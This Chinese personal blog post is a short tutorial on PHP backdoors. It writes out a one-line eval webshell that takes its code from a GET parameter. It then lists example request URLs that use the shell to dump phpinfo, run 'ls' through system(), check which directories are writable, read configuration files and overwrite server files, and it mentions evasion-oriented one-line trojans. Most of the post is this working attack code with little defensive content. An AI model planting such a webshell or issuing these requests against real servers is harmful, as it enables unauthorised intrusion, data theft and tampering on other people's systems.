阿八博客
  • 100000+

    文章

  • 23

    评论

  • 20

    友链

  • 最近新加了很多技术文章,大家多来逛逛吧~~~~
  • 喜欢这个网站的朋友可以加一下QQ群,我们一起交流技术。

PHP后门系统程序的一些用法(开源的系统谨慎使用啊!都是坑)

欢迎来到阿八个人博客网站。本 阿八个人博客 网站提供最新的站长新闻,各种互联网资讯。 喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术! URL链接:https://www.abboke.com/jl/2019/1010/116279.html
 

 
首先呢?我作为一名程序员,也是非常熟悉后门了。因为一个后门程序,会让你的系统服务器都瘫痪。
 
首先,写一个最简单的后门,也可以叫做木马。
 
 
 
<?php eval($_GET['evl']);
 
就这样,你已经获得了这台服务器上的很多执行权限。
 
那场景的用法有哪些呢?
 
打印服务器phpinfo
 
 
http://www.test.com/a.php?evl=phpinfo()
 
查看某个目录下有什么文件
 
 
 
http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));
 
查看目录是否可写,接下里就可以在可写的目录里创建可执行文件了
 
 
 
http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));
 
获取某个文件的内容,一般用来读取配置
 
 
 
http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));
 
对某个可写目录进行写文件
 
 
 
http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));
 
 
无特征PHP一句话木马
分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8 、或sqlite/pdo/yaml/memcached扩展等)
 
好了,以上基本已经可以完成对一个服务器的查看的部分破坏了,其他的功能就试着举一反三吧。
 
 
大家也可以来攻击一下我的网站,前提是你得获取上传文件权限。
 
更神秘的东西,不给大家了。太那个,为了网络安全不会分享出来。

大家千万不要怕被攻击,因为不被攻击,你的网站才是最危险的。有可能已经入侵进来了
 

相关文章

暂住......别动,不想说点什么吗?
  • 全部评论(0
    还没有评论,快来抢沙发吧!